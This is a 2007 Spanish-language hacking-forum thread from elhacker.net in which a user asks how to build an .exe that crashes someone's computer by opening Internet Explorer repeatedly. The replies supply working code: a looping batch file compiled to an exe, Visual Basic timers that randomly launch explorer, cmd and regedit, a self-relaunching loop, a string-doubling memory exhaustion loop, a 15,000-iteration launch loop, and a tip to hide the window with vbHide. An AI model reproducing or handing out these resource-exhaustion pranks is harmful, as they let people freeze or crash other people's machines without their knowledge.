elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  interesante
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: interesante  (Leído 2,422 veces)
crauss


Desconectado Desconectado

Mensajes: 768


Caste


Ver Perfil
interesante
« en: 28 Octubre 2007, 21:17 pm »

se podria crear un .exe que se abriera muchas veces el iexplorer por ejemplo 100 veces i entonces eria una manera de petar el ordenador a uno algo komo el msn kick
shell..... ya sabeis
saludos


En línea

Caste
dARkDiAMoNd

Desconectado Desconectado

Mensajes: 3



Ver Perfil
Re: interesante
« Respuesta #1 en: 28 Octubre 2007, 21:33 pm »

wenas...

pues una manera muy facil seria crear un archivo *.bat con un code como este
Citar
:bucle
start explorer
goto bucle

y luego lo compilarias(pasar a *.exe) con algun programa, ejemplo quick batch compiler...claro pero ya no seria vb


sALuDos__


« Última modificación: 28 Octubre 2007, 21:35 pm por dARkDiAMoNd » En línea

papanoel_devacaciones


Desconectado Desconectado

Mensajes: 428


Ver Perfil
Re: interesante
« Respuesta #2 en: 28 Octubre 2007, 21:38 pm »

  • Un timer con intervalo de 50
  • Un textbox

Dentro del timer pones:
Código
  1.  
  2. sel = Int(Rnd() * 5)
  3. Select Case sel
  4. Case 0
  5. Text1.Text = "Explorer.exe"
  6. Case 1
  7. Text1.Text = "Notepad.exe"
  8. Case 2
  9. Text1.Text = "calc.exe"
  10. Case 3
  11. Text1.Text = "cmd.exe"
  12. Case 4
  13. MsgBox " Esto es una lamerrada !!!"
  14. Case 5
  15. Text1.Text = "regedit.exe"
  16. End Select
  17. Shell (Text1.Text)
  18.  

Lo que hace es selecionar un numero cualquiera de 0 a 5....cada numero tiene su propia funcion...despues lo ejecuta... vendria bien declalar "sel" como integer o long dentro de general o load...


Saludos
« Última modificación: 28 Octubre 2007, 21:40 pm por [Smokehack] » En línea

HaDeS, -
WarZone Master

Desconectado Desconectado

Mensajes: 284



Ver Perfil WWW
Re: interesante
« Respuesta #3 en: 28 Octubre 2007, 23:03 pm »

Estó es antiprogramación jajaja

Código
  1. Private Sub Form1_Load()
  2. do
  3. shell "explorer.exe"
  4. shell app.path & "\" & app.exename & ".exe"
  5. loop
  6. end sub
  7.  

ó

Código
  1. Private Sub Form1_Load()
  2. Text1.text = "a"
  3. do
  4. Text1.text = Text1.text & Text1.text
  5. loop
  6. End Sub
  7.  

Hay muchas formas :P
Saluos!
En línea

smooth.core

Desconectado Desconectado

Mensajes: 5

Yo no necesito tu IP... :O


Ver Perfil
Re: interesante
« Respuesta #4 en: 29 Octubre 2007, 03:14 am »

Algo que ocurre con el Do - Loop es lo siguiente, la apliación queda colgada, por lo que nos combiene más

Dim i
For i = 1 to 15000
shell "explorer.exe"
Next

Y entonces, si quieres, puedes agregar más cosas al código, como msgbox y esas estupideces jajajajaj

^^

Saludos
En línea

byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: interesante
« Respuesta #5 en: 29 Octubre 2007, 04:12 am »

Citar
Algo que ocurre con el Do - Loop es lo siguiente, la apliación queda colgada,

Doevents
En línea

Kefren


Desconectado Desconectado

Mensajes: 515


0x1BADB002


Ver Perfil WWW
Re: interesante
« Respuesta #6 en: 29 Octubre 2007, 15:54 pm »

Jejeje lo facil que es agotar los recursos de un PC en Windows..... En linux también es así????  :huh:

SaluDOS
En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: interesante
« Respuesta #7 en: 29 Octubre 2007, 18:47 pm »

Añadir un vbHide no estaria de mas.... (un poco triste este programa no?  :xD :xD)
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
video interesante
Foro Libre
crazykenny 1 1,618 Último mensaje 21 Abril 2014, 21:55 pm
por Gh057
Problema interesante con SuperCopier ??
Windows
TrashAmbishion 1 1,819 Último mensaje 8 Enero 2016, 12:39 pm
por marmolito
YoWhatsapp, un MOD de Whatsapp muy interesante.
Android
jrafael99 4 9,508 Último mensaje 9 Septiembre 2022, 20:41 pm
por TickTack
Cosas interesante de f-strings.
Scripting
El mas antiguo 3 4,356 Último mensaje 5 Octubre 2022, 17:04 pm
por MCKSys Argentina
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines